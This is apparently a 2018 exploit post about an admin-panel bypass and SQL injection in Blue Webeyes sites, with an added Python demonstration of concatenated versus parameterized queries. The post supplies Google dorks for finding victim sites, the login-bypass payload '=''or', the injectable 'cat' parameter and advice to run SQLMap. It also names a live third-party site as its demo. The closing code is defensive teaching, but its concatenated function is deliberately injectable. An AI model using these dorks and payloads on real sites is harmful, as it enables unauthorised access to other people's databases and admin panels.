Thursday, February 1, 2018

Blue Webeyes Admin Panel Bypass and SQL Injection Vulnerability



Exploit title : Blue Webeyes Admin Panel Bypass and SQL Injection Vulnerability

Google Dork :

  • Powered by Blue Webeyes  
  • "Powered by Blue Webeyes" inurl:php?
  • Created and Supported by Blue Webeyes © 2006
  • Build on these yourself, boss
Proof of Concept :
  • Search Google with the dork
  • Pick one of the sites
  • Enter /admin or /admin/index.php
  • Bypass with SQL injection as usual, using '=''or'
  • Vulnerable? Take a look
  • SQL: the GET parameter 'cat' is vulnerable
  • Run it with SQLMap or similar.
  • Demo: SQL: http://armyradio.gr/armyradio.php?cat=87&rec=232'
Greetz : Trazer & Sipahiler & TurkZ.org
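
Why the trailing quote in the demo URL matters, and how the query should be written instead, shown as an added example that is not code from the original post or from Blue Webeyes. The table schema, sample rows and function names are assumptions, and an in-memory SQLite database stands in for the site's real database.

```python
import re
import sqlite3

def make_db():
    # Constructed schema and rows; the application's real tables are not on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE records (cat INTEGER, rec INTEGER, title TEXT)")
    db.executemany("INSERT INTO records VALUES (?, ?, ?)",
                   [(87, 232, "show A"), (87, 233, "show B"), (12, 5, "show C")])
    return db

def lookup_concatenated(db, cat, rec):
    """'Before': request values are pasted straight into the SQL text."""
    sql = "SELECT title FROM records WHERE cat = " + cat + " AND rec = " + rec
    return db.execute(sql).fetchall()

def lookup_parameterized(db, cat, rec):
    """'After': accept only ASCII decimal integers, then bind them as parameters."""
    for value in (cat, rec):
        if not re.fullmatch(r"[0-9]{1,9}", value):
            raise ValueError("cat and rec must be decimal integers")
    sql = "SELECT title FROM records WHERE cat = ? AND rec = ?"
    return db.execute(sql, (int(cat), int(rec))).fetchall()

def probe(db, cat, rec):
    """Return the outcome of the concatenated query, then of the parameterized one."""
    outcomes = []
    for lookup in (lookup_concatenated, lookup_parameterized):
        try:
            outcomes.append(("rows", lookup(db, cat, rec)))
        except sqlite3.Error as exc:
            # The input reached the SQL parser: this is the injectable path.
            outcomes.append(("sql_error", type(exc).__name__))
        except ValueError as exc:
            # The input was refused before any SQL was built.
            outcomes.append(("rejected", str(exc)))
    return tuple(outcomes)

if __name__ == "__main__":
    db = make_db()
    print(probe(db, "87", "232"))    # well-formed request, same rows from both
    print(probe(db, "87", "232'"))   # the demo URL's values: SQL error vs. rejection
```

A database error on the `232'` request means request data is being parsed as SQL; with validation and bound parameters the same request never reaches the parser.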
